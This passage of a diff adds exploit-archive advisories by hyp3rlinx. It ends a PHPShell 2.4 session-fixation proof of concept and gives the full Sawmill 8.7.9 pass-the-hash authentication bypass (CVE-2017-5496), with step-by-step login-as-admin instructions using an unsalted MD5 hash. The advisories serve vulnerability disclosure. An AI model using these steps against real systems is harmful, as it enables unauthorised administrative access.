+ + + +Exploit/POC: +============= + +1) Login to PHPShell run commands to CD to Windows directory and run DIR +command etc, then find and copy the PHPSESSID Cookie + +2) Open a second browser (InternetExplorer) and access the application +cleanly for first time using the PHPSESSID in URL. + +e.g. + +http://VICTIM-IP/phpshell-2.4/phpshell.php?PHPSESSID= + +You should see what the authenticated victim now sees... + +e.g. + +Current Working Directory: +Change to subdirectory: + +07/13/2009 08:51 PM 24,576 Microsoft.MediaCenter.iTv.Hosting.dll +11/20/2010 10:24 PM 147,968 Microsoft.MediaCenter.iTV.Media.dll +07/13/2009 08:52 PM 45,056 Microsoft.MediaCenter.ITVVM.dll +11/20/2010 10:24 PM 56,320 Microsoft.MediaCenter.Mheg.dll +11/20/2010 10:24 PM 114,688 Microsoft.MediaCenter.Playback.dll +11/20/2010 10:24 PM 1,572,864 Microsoft.MediaCenter.Shell.dll +11/20/2010 10:24 PM 241,664 Microsoft.MediaCenter.Sports.dll +11/20/2010 10:24 PM 327,168 +Microsoft.MediaCenter.TV.Tuners.Interop.dll +11/20/2010 10:24 PM 2,596,864 Microsoft.MediaCenter.UI.dll +10/29/2011 12:23 AM 465,920 mstvcapn.dll +11/20/2010 10:24 PM 88,576 NetBridge.dll +07/13/2009 08:51 PM 106,496 RegisterMCEApp.exe +06/10/2009 04:04 PM 129,528 segmcr.ttf + +etc... + + + +Network Access: +=============== +Remote + + + + +Severity: +========= +Medium + + + +Disclosure Timeline: +============================= +Vendor Notification: No reply +Also, the INSTALL file "Bugs? Comments? Tracker System link" is HTTP 404 +http://sourceforge.net/tracker/?group_id=156638 +February 18, 2017 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no +warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, +provided that it is not altered except by reformatting it, and +that due credit is given. 
Permission is explicitly given for insertion in +vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the +information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author +prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c) HYP3RLINX - +ApparitionSec diff --git a/platforms/windows/webapps/41395.txt b/platforms/windows/webapps/41395.txt new file mode 100755 index 000000000..3cb0948ce --- /dev/null +++ b/platforms/windows/webapps/41395.txt 
@@ -0,0 +1,138 @@ +[+] Credits: John Page AKA Hyp3rlinx +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/SAWMILL-PASS-THE-HASH-AUTHENTICATION-BYPASS.txt +[+] ISR: ApparitionSec + + + +Vendor: +=============== +www.sawmill.net + + + +Product: +======================== +Sawmill Enterprise v8.7.9 + +sawmill8.7.9.4_x86_windows.exe +hash: b7ec7bc98c42c4908dfc50450b4521d0 + +Sawmill is a powerful heirarchical log analysis tool that runs on every +major platform. + + +Vulnerability Type: +=================================== +Pass the Hash Authentication Bypass + + + +CVE Reference: +============== +CVE-2017-5496 + + + +Security Issue: +===================== +Sawmill suffers from a classic "Pass The Hash" vulnerability whereby an +attacker who gains access to the hashed user account passwords +can login to the Sawmill interface using the raw MD5 hash values, allowing +attackers to bypass the work of offline cracking +account password hashes. + + +This issue usually is known to affect Windows systems e.g. (NT Pass the +Hash/Securityfocus, 1997). However, this vulnerability can also +present itself in a vulnerable Web application. + +Sawmill account password hashes are stored under LogAnalysisInfo/ directory +in "users.cfg". + +e.g. + +users = { + root_admin = { + username = "admin" + password_checksum = "e99a18c428cb38d5f260853678922e03" + email_address = "" + + +This config file is stored local to the Sawmill application. However, if an +attacker gains access to a backup of the config that is +stored in some other location that is then compromised, it can lead to +subversion of Sawmills authenticaton process. + +Moreover, since 'users.cfg' file is world readble a regular non Admin +Windows user who logs into the system running sawmill can now grab +a password hash and easily login to the vulnerable application without the +needing the password itself. + + +How to test? 
+ + +Sawmill running (default port 8988), log off Windows and switch to a +"Standard" Windows non Administrator user. + +1) Open "users.cfg" under Sawmills directory "C:\Program Files\Sawmill 8\LogAnalysisInfo" and copy the root_admin Admin password hash. + +2) Go to the Sawmill login page in web browser http://VICTIM-IP:8988/ enter username 'admin' and the hash, Tada! your Admin. + + +Finally, Sawmill passwords are hashed using vulnerable MD5 algorithm and no +salt. + + +e.g. + +password: abc123 +MD5 hash: +e99a18c428cb38d5f260853678922e03 + + + +Disclosure Timeline: +===================================== +Vendor Notification: January 7, 2017 +CVE-2017-5496 assigned : January 20 +Request status : January 26 +Vendor: Fix avail later in year still no ETA +Inform vendor public disclose date +February 18, 2017 : Public Disclosure + + + +Network Access: +=============== +Remote + + + +Impact: +====================== +Information Disclosure +Privilege Escalation + + + +Severity Level: +================ +High + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no +warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, +provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in +vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the +information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author +prohibits any malicious use of security related information +or exploits by the author or elsewhere. +